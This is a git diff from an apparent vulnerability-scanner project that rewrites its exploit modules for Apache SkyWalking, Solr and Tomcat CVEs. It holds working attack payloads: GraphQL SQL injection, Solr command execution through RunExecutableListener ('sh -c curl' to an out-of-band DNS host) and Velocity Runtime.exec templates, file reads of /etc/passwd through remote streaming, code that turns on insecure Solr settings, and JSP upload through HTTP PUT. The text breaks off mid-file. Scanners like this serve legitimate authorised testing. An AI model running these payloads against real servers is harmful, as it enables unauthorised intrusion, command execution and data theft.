thread(target=cve_2023_25194_scan, clients=clients) - ] - -kafka = ApacheKafka() diff --git a/payloads/ApacheSkyWalking/apache-skywalking-cve-2020-9483-sqlinject.py b/payloads/ApacheSkyWalking/apache-skywalking-cve-2020-9483-sqlinject.py new file mode 100644 index 0000000..1bd07de --- /dev/null +++ b/payloads/ApacheSkyWalking/apache-skywalking-cve-2020-9483-sqlinject.py @@ -0,0 +1,67 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Apache SkyWalking是阿帕奇的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器 + SkyWalking SQL注入 + CVE-2020-9483 + Payload: https://vulhub.org/#/environments/skywalking/8.3.0-sqli/ + +在Apache Skywalking 8.3.0版本及以前的GraphQL接口中, 存在一处H2 Database SQL注入漏洞 +''' + +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + { + 'path': 'graphql', + 'data': '''{"query":"query queryLogs($condition:LogQueryCondition){queryLogs(condition: $condition) {total logs {serviceId serviceName isError content}}}","variables":{"condition":{"metricName":"sqli","state":"ALL","paging":{"pageSize":10}}}}''' + }, + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'ApacheSkyWalking', + 'vul_type': 'SQLinject', + 'vul_id': 'CVE-2020-9483', + } + + headers = { + 'Content-Type': 'application/json' + } + + for payload in self.payloads: + path = payload['path'] + data = payload['data'] + + res = client.request( + 'post', + path, + data=data, + headers=headers, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + if (('Exception while fetching data (/queryLogs) : Table \\"SQLI\\" not found' in res.text) + and ('select 1 from sqli where 1=1' in res.text) + ): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheSkyWalking/cve_2020_9483.py b/payloads/ApacheSkyWalking/cve_2020_9483.py deleted file mode 100644 index 1812012..0000000 --- a/payloads/ApacheSkyWalking/cve_2020_9483.py +++ /dev/null @@ -1,77 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -# import re - -cve_2020_9483_payloads = [ - { - 'path': 'graphql', - 'data': '''{"query":"query queryLogs($condition:LogQueryCondition){queryLogs(condition: $condition) {total logs {serviceId serviceName isError content}}}","variables":{"condition":{"metricName":"sqli","state":"ALL","paging":{"pageSize":10}}}}''' - }, -# { -# 'path': 'graphql', -# 'data': '''{ -# "query":"query queryLogs($condition: LogQueryCondition) { -# queryLogs(condition: $condition) { -# total -# logs { -# serviceId -# serviceName -# isError -# content -# } -# } -# } -# ", -# "variables":{ -# "condition":{ -# "metricName":"sqli", -# "state":"ALL", -# "paging":{ -# "pageSize":10 -# } -# } -# } -# }''' -# }, -] - -def cve_2020_9483_scan(clients): - ''' 在Apache Skywalking 8.3.0版本及以前的GraphQL接口中, 存在一处H2 Database SQL注入漏洞 ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'ApacheSkyWalking', - 'vul_type': 'SQLinject', - 'vul_id': 'CVE-2020-9483', - } - - headers = { - 'Content-Type': 'application/json' - } - - for payload in cve_2020_9483_payloads: - path = payload['path'] - data = payload['data'] - - res = client.request( - 'post', - path, - data=data, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - if (('Exception while fetching data (/queryLogs) : Table \\"SQLI\\" not found' in res.text) - and ('select 1 from sqli where 1=1' in res.text) - ): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/ApacheSkyWalking/main.py b/payloads/ApacheSkyWalking/main.py deleted file mode 100644 index 4996f6e..0000000 --- a/payloads/ApacheSkyWalking/main.py +++ /dev/null @@ -1,32 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' -Apache SkyWalking是阿帕奇的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器 - Apache SkyWalking扫描类: - 1. SkyWalking SQL注入 - CVE-2020-9483 - Payload: https://vulhub.org/#/environments/skywalking/8.3.0-sqli/ - -file:///etc/passwd -file:///C:/Windows/System32/drivers/etc/hosts -file:///C:\Windows\System32\drivers\etc\hosts -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.ApacheSkyWalking.cve_2020_9483 import cve_2020_9483_scan - -class ApacheSkyWalking(): - def __init__(self): - self.app_name = 'ApacheSkyWalking' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2020_9483_scan, clients=clients) - ] - -skywalking = ApacheSkyWalking() diff --git a/payloads/ApacheSolr/apache-solr-cve-2017-12629-rce.py b/payloads/ApacheSolr/apache-solr-cve-2017-12629-rce.py new file mode 100644 index 0000000..63afb43 --- /dev/null +++ b/payloads/ApacheSolr/apache-solr-cve-2017-12629-rce.py @@ -0,0 +1,127 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Solr 远程命令执行 + CVE-2017-12629 + Payload: https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/ + +7.1.0之前版本总共爆出两个漏洞: XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE) + 二者可以连接成利用链, 编号均为CVE-2017-12629 +''' + +from payloads.ApacheSolr.tool_enable import enable +from lib.initial.config import config +from lib.api.dns import dns +from lib.tool.md5 import random_md5 +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + random_name = random_md5() + self.payloads = [ + { + 'path': 'solr/{DBNAME}/config', + 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "curl DNSDOMAIN"]}}', + 'path-2': 'solr/{DBNAME}/update', + 'data-2': '[{"id":"test"}]', + }, + { + 'path': 'solr/{DBNAME}/config', + 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 4 DNSDOMAIN"]}}', + 'path-2': 'solr/{DBNAME}/update', + 'data-2': '[{"id":"test"}]', + }, + { + 'path': 'solr/{DBNAME}/config', + 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping DNSDOMAIN"]}}', + 'path-2': 'solr/{DBNAME}/update', + 'data-2': '[{"id":"test"}]', + }, + { + 'path': 'config', + 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "curl DNSDOMAIN"]}}', + 'path-2': 'update', + 'data-2': '[{"id":"test"}]', + }, + { + 'path': 'config', + 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 4 DNSDOMAIN"]}}', + 'path-2': 'update', + 'data-2': '[{"id":"test"}]', + }, + { + 'path': 'config', + 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping DNSDOMAIN"]}}', + 'path-2': 'update', + 'data-2': '[{"id":"test"}]', + } + ] + + def POC(self, clients): + client = clients.get('reqClient') + sessid = '60491ea49ab435a2cc1acb7aa93e3409' + + vul_info = { + 'app_name': 'ApacheSolr', + 'vul_type': 'RCE', + 'vul_id': 'CVE-2017-12629', + } + + headers = { + 'Content-Type': 'application/json' + } + + if not config.get('Solr-db_name'): + enable(client) # * 如果没有Solr数据库名称, 则获取 + if not config.get('Solr-db_name'): + return None # * 如果还是没有, 则退出 + + dnslog_md = random_md5() # * 随机md5值, 8位 + dnslog_domain = dnslog_md + '.' + dns.domain(sessid) # * dnslog/ceye域名 + + for payload in self.payloads: + path = payload['path'].format(DBNAME=config.get('Solr-db_name')) + data = payload['data'].replace('DNSDOMAIN', dnslog_domain) + + res = client.request( + 'post', + path, + data=data, + headers=headers, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + if ('"WARNING":"This response format is experimental. It is likely to change in the future."' in res.text): + path_2 = payload['path-2'].format(DBNAME=config.get('Solr-db_name')) + data_2 = payload['data-2'] + + res2 = client.request( + 'post', + path_2, + data=data_2, + headers=headers, + allow_redirects=False, + vul_info=vul_info + ) + if res2 is None: + continue + + if (dns.result(dnslog_md, sessid, 10)): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res, + 'Request-2': res2 + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheSolr/apache-solr-cve-2019-17558-rce.py b/payloads/ApacheSolr/apache-solr-cve-2019-17558-rce.py new file mode 100644 index 0000000..e7c310d --- /dev/null +++ b/payloads/ApacheSolr/apache-solr-cve-2019-17558-rce.py @@ -0,0 +1,69 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Solr Velocity 注入远程命令执行 + CVE-2019-17558 + Payload: https://vulhub.org/#/environments/solr/CVE-2019-17558/ + +5.0.0版本至8.3.1版本中存在输入验证错误漏洞, + 攻击者可借助自定义的Velocity模板功能, 利用Velocity-SSTI漏洞在Solr系统上执行任意代码 +''' + +from payloads.ApacheSolr.tool_enable import enable +from lib.initial.config import config +from lib.tool.md5 import random_md5 +from lib.tool import check +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + {'path': "solr/{DBNAME}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"}, + {'path': "{DBNAME}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"}, + {'path': "select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"}, + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'ApacheSolr', + 'vul_type': 'RCE', + 'vul_id': 'CVE-2019-17558', + } + + if not config.get('Solr-params'): + enable(client) # * 此漏洞需要启用Solr的RemoteStreaming功能 + if not config.get('Solr-params'): + return None # * 如果启用失败, 退出 + + for payload in self.payloads: + random_str = random_md5(6) + RCEcommand = 'echo ' + random_str + + path = payload['path'].format(DBNAME=config.get('Solr-db_name'), RCECOMMAND=RCEcommand) + + res = client.request( + 'get', + path, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + if (check.check_res(res.text, random_str)): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheSolr/apache-solr-cve-2021-27905-ssrf-fileread.py b/payloads/ApacheSolr/apache-solr-cve-2021-27905-ssrf-fileread.py new file mode 100644 index 0000000..785a297 --- /dev/null +++ b/payloads/ApacheSolr/apache-solr-cve-2021-27905-ssrf-fileread.py @@ -0,0 +1,76 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Solr SSRF/任意文件读取 + CVE-2021-27905 + Payload: https://vulhub.org/#/environments/solr/Remote-Streaming-Fileread/ + https://www.freebuf.com/vuls/279278.html + +当Solr不启用身份验证时, 攻击者可以直接制造请求以启用特定配置, 最终导致SSRF或任意文件读取 +''' + +from payloads.ApacheSolr.tool_enable import enable +from lib.initial.config import config +from lib.tool import check +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + # * SSRF + # {'path': 'solr/{DBNAME}/replication?command=fetchindex&masterUrl=http://DNSDOMAIN'}, + # {'path': '{DBNAME}/replication?command=fetchindex&masterUrl=http://DNSDOMAIN'}, + # {'path': 'replication?command=fetchindex&masterUrl=http://DNSDOMAIN'}, + # * FileRead + {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'}, + {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'}, + {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'}, + {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'}, + {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'}, + {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'}, + {'path': 'debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'}, + {'path': 'debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'}, + {'path': 'debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'}, + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'ApacheSolr', + 'vul_type': 'SSRF/FileRead', + 'vul_id': 'CVE-2021-27905', + } + + if not config.get('Solr-RemoteStreaming'): + enable(client) # * 开启Solr的RemoteStreaming + if not config.get('Solr-RemoteStreaming'): + return None # * 如果开启失败, 退出 + + for payload in self.payloads: # * Payload + path = payload['path'].format(DBNAME=config.get('Solr-db_name')) # * Path + + res = client.request( + 'get', + path, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + if (check.check_res_fileread(res.text)): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheSolr/cve_2017_12629.py b/payloads/ApacheSolr/cve_2017_12629.py deleted file mode 100644 index 80135a9..0000000 --- a/payloads/ApacheSolr/cve_2017_12629.py +++ /dev/null @@ -1,112 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.api.dns import dns -from lib.tool.md5 import random_md5 -# from lib.tool import check -from time import sleep - -random_name = random_md5() -cve_2017_12629_payloads = [ - { - 'path': 'solr/{DBNAME}/config', - 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "curl DNSDOMAIN"]}}', - 'path-2': 'solr/{DBNAME}/update', - 'data-2': '[{"id":"test"}]', - }, - { - 'path': 'solr/{DBNAME}/config', - 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 4 DNSDOMAIN"]}}', - 'path-2': 'solr/{DBNAME}/update', - 'data-2': '[{"id":"test"}]', - }, - { - 'path': 'solr/{DBNAME}/config', - 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping DNSDOMAIN"]}}', - 'path-2': 'solr/{DBNAME}/update', - 'data-2': '[{"id":"test"}]', - }, - { - 'path': 'config', - 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "curl DNSDOMAIN"]}}', - 'path-2': 'update', - 'data-2': '[{"id":"test"}]', - }, - { - 'path': 'config', - 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 4 DNSDOMAIN"]}}', - 'path-2': 'update', - 'data-2': '[{"id":"test"}]', - }, - { - 'path': 'config', - 'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping DNSDOMAIN"]}}', - 'path-2': 'update', - 'data-2': '[{"id":"test"}]', - } -] - -def cve_2017_12629_scan(self, clients): - ''' 7.1.0之前版本总共爆出两个漏洞: XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE) - 二者可以连接成利用链, 编号均为CVE-2017-12629 - ''' - client = clients.get('reqClient') - sessid = '60491ea49ab435a2cc1acb7aa93e3409' - - vul_info = { - 'app_name': self.app_name, - 'vul_type': 'RCE', - 'vul_id': 'CVE-2017-12629', - } - - headers = { - 'Content-Type': 'application/json' - } - - self.enable(client) # * 需要获取数据库名称 DBname - if not self.db_name: - return None - - dnslog_md = random_md5() # * 随机md5值, 8位 - dnslog_domain = dnslog_md + '.' + dns.domain(sessid) # * dnslog/ceye域名 - - for payload in cve_2017_12629_payloads: - path = payload['path'].format(DBNAME=self.db_name) - data = payload['data'].replace('DNSDOMAIN', dnslog_domain) - - res = client.request( - 'post', - path, - data=data, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - if ('"WARNING":"This response format is experimental. It is likely to change in the future."' in res.text): - path_2 = payload['path-2'].format(DBNAME=self.db_name) - data_2 = payload['data-2'] - - res2 = client.request( - 'post', - path_2, - data=data_2, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res2 is None: - continue - - sleep(10) # * solr响应太慢啦! - if (dns.result(dnslog_md, sessid)): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res, - 'Request-2': res2 - } - return results - return None diff --git a/payloads/ApacheSolr/cve_2019_17558.py b/payloads/ApacheSolr/cve_2019_17558.py deleted file mode 100644 index 8d410fa..0000000 --- a/payloads/ApacheSolr/cve_2019_17558.py +++ /dev/null @@ -1,57 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool.md5 import random_md5 -from lib.tool import check - -cve_2019_17558_payloads = [ - { - 'path': "solr/{DBNAME}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end", - }, - { - 'path': "{DBNAME}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end", - }, - { - 'path': "select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end", - }, -] - -def cve_2019_17558_scan(self, clients): - ''' 5.0.0版本至8.3.1版本中存在输入验证错误漏洞, - 攻击者可借助自定义的Velocity模板功能, 利用Velocity-SSTI漏洞在Solr系统上执行任意代码 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': self.app_name, - 'vul_type': 'RCE', - 'vul_id': 'CVE-2019-17558', - } - - self.enable(client) # * 此漏洞需要启用Solr的RemoteStreaming功能 - if not self.params: - return None - - for payload in cve_2019_17558_payloads: - random_str = random_md5(6) - RCEcommand = 'echo ' + random_str - - path = payload['path'].format(DBNAME=self.db_name, RCECOMMAND=RCEcommand) - - res = client.request( - 'get', - path, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - if (check.check_res(res.text, random_str)): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/ApacheSolr/cve_2021_27905.py b/payloads/ApacheSolr/cve_2021_27905.py deleted file mode 100644 index 7d70bb9..0000000 --- a/payloads/ApacheSolr/cve_2021_27905.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool import check - -cve_2021_27905_payloads = [ - # * SSRF - # {'path': 'solr/{DBNAME}/replication?command=fetchindex&masterUrl=http://DNSDOMAIN'}, - # {'path': '{DBNAME}/replication?command=fetchindex&masterUrl=http://DNSDOMAIN'}, - # {'path': 'replication?command=fetchindex&masterUrl=http://DNSDOMAIN'}, - # * FileRead - {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'}, - {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'}, - {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'}, - {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'}, - {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'}, - {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'}, - {'path': 'debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'}, - {'path': 'debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'}, - {'path': 'debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'}, -] - -def cve_2021_27905_scan(self, clients): - ''' 当Solr不启用身份验证时, 攻击者可以直接制造请求以启用特定配置, 最终导致SSRF或任意文件读取 ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': self.app_name, - 'vul_type': 'SSRF/FileRead', - 'vul_id': 'CVE-2021-27905', - } - - self.enable(client) # * 开启Solr的RemoteStreaming - if not self.RemoteStreaming: - return None - - for payload in cve_2021_27905_payloads: # * Payload - path = payload['path'].format(DBNAME=self.db_name) # * Path - - res = client.request( - 'get', - path, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - if (check.check_res_fileread(res.text)): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/ApacheSolr/main.py b/payloads/ApacheSolr/main.py deleted file mode 100644 index 28f1ed0..0000000 --- a/payloads/ApacheSolr/main.py +++ /dev/null @@ -1,53 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - ApacheSolr扫描类: - 1. Solr SSRF/任意文件读取 - CVE-2021-27905 - Payload: https://vulhub.org/#/environments/solr/Remote-Streaming-Fileread/ - https://www.freebuf.com/vuls/279278.html - - 2. Solr 远程命令执行 - CVE-2017-12629 - Payload: https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/ - - 3. Solr Velocity 注入远程命令执行 - CVE-2019-17558 - Payload: https://vulhub.org/#/environments/solr/CVE-2019-17558/ - -file:///etc/passwd -file:///C:\Windows\System32\drivers\etc\hosts -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.ApacheSolr.tool_enable import enable -from payloads.ApacheSolr.cve_2017_12629 import cve_2017_12629_scan -from payloads.ApacheSolr.cve_2019_17558 import cve_2019_17558_scan -from payloads.ApacheSolr.cve_2021_27905 import cve_2021_27905_scan - -class Solr(): - def __init__(self): - self.app_name = 'ApacheSolr' - - self.db_name = '' - self.RemoteStreaming = False - self.params = False - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target=self.{}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=self.cve_2017_12629_scan, clients=clients), - thread(target=self.cve_2019_17558_scan, clients=clients), - thread(target=self.cve_2021_27905_scan, clients=clients), - ] - -Solr.enable = enable -Solr.cve_2017_12629_scan = cve_2017_12629_scan -Solr.cve_2019_17558_scan = cve_2019_17558_scan -Solr.cve_2021_27905_scan = cve_2021_27905_scan - -solr = Solr() \ No newline at end of file diff --git a/payloads/ApacheSolr/tool_enable.py b/payloads/ApacheSolr/tool_enable.py index f8b1eed..7c3e210 100644 --- a/payloads/ApacheSolr/tool_enable.py +++ b/payloads/ApacheSolr/tool_enable.py @@ -1,6 +1,7 @@ #!/usr/bin/env python3 # -*- coding:utf-8 -*- +from lib.initial.config import config import re config_data_base = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' @@ -27,11 +28,11 @@ } ] -def enable(self, client): +def enable(client): ''' 用于开启Solr的RemoteStreaming或自定义模板(params.resource.loader.enabled) ''' vul_info = { - 'app_name': self.app_name, - 'vul_type': 'Solr', + 'app_name': 'ApacheSolr', + 'vul_type': 'Solr-Tool', 'vul_id': 'Solr-enable', } @@ -40,7 +41,7 @@ def enable(self, client): } for payload in enable_payloads: - if self.params: + if config.get('Solr-params'): return core_path = payload['core_path'] @@ -56,17 +57,17 @@ def enable(self, client): if res1 is None: return - db_name = re.search(r'"name":".+"', res1.text, re.M|re.I) # * 如果存在solr的数据库名称 + db_name = re.search(r'"name":".+"', res1.text, re.M|re.I) # * 如果存在solr的数据库名称 if db_name: db_name = db_name.group() db_name = db_name.replace('"name":', '') - self.db_name = db_name.strip('"') # * 只保留双引号内的数据库名称 + config.set('Solr-db_name', db_name.strip('"')) # * 只保留双引号内的数据库名称 - if self.db_name: + if config.get('Solr-db_name'): # todo 2. 开启RemoteStreaming res2 = client.request( 'post', - config_path.format(self.db_name), + config_path.format(config.get('Solr-db_name')), data=config_data, headers=headers, allow_redirects=False, @@ -76,12 +77,12 @@ def enable(self, client): return if (res2.status_code == 200): - self.RemoteStreaming = True - + config.set('Solr-RemoteStreaming', True) + # todo 3. 开启params.resource.loader.enabled res3 = client.request( 'post', - config_path.format(self.db_name), + config_path.format(config.get('Solr-db_name')), data=params_data, headers=headers, allow_redirects=False, @@ -89,7 +90,7 @@ def enable(self, client): ) if res3 is None: return - + if (res3.status_code == 200): - self.params = True + config.set('Solr-params', True) return None diff --git a/payloads/ApacheTomcat/apache-tomcat-cve-2017-12615-fileupload.py b/payloads/ApacheTomcat/apache-tomcat-cve-2017-12615-fileupload.py new file mode 100644 index 0000000..b848d91 --- /dev/null +++ b/payloads/ApacheTomcat/apache-tomcat-cve-2017-12615-fileupload.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Tomcat PUT方法任意文件写入漏洞 + CVE-2017-12615 + Payload: https://vulhub.org/#/environments/tomcat/CVE-2017-12615/ + https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5 + +Tomcat PUT方法任意文件写入漏洞 + PUT方法可用, 上传未做过滤, 可以写入任意文件 +''' + +from lib.tool.md5 import random_md5 +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + { + 'path': '{PATH}.jsp/', + 'data': '<% out.println("

    {TEXT}

    "); %>', + 'path-2': '{PATH}.jsp' + }, + { + 'path': '{PATH}.jsp%20', + 'data': '<% out.println("

    {TEXT}

    "); %>', + 'path-2': '{PATH}.jsp' + }, + { + 'path': '{PATH}.jsp::$DATA', + 'data': '<% out.println("

    {TEXT}

    "); %>', + 'path-2': '{PATH}.jsp' + }, + { + 'path': '{PATH}.jsp', + 'data': '<% out.println("

    {TEXT}

    "); %>', + 'path-2': '{PATH}.jsp' + } + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'ApacheTomcat', + 'vul_type': 'File-Upload', + 'vul_id': 'CVE-2017-12615', + } + + for payload in self.payloads: # * Payload + random_str_1 = random_md5(6) + random_str_2 = random_md5(6) + + path = payload['path'].format(PATH=random_str_1) # * Path + data = payload['data'].format(TEXT=random_str_2) # * Data + path_2 = payload['path-2'].format(PATH=random_str_1) # * Path-2 + + res = client.request( + 'put', + path, + data=data, + vul_info=vul_info + ) + if res is None: + continue + + res2 = client.request( + 'get', + path_2, + allow_redirects=False, + vul_info=vul_info + ) + if res2 is None: + continue + + text = '

    ' + random_str_2 + '

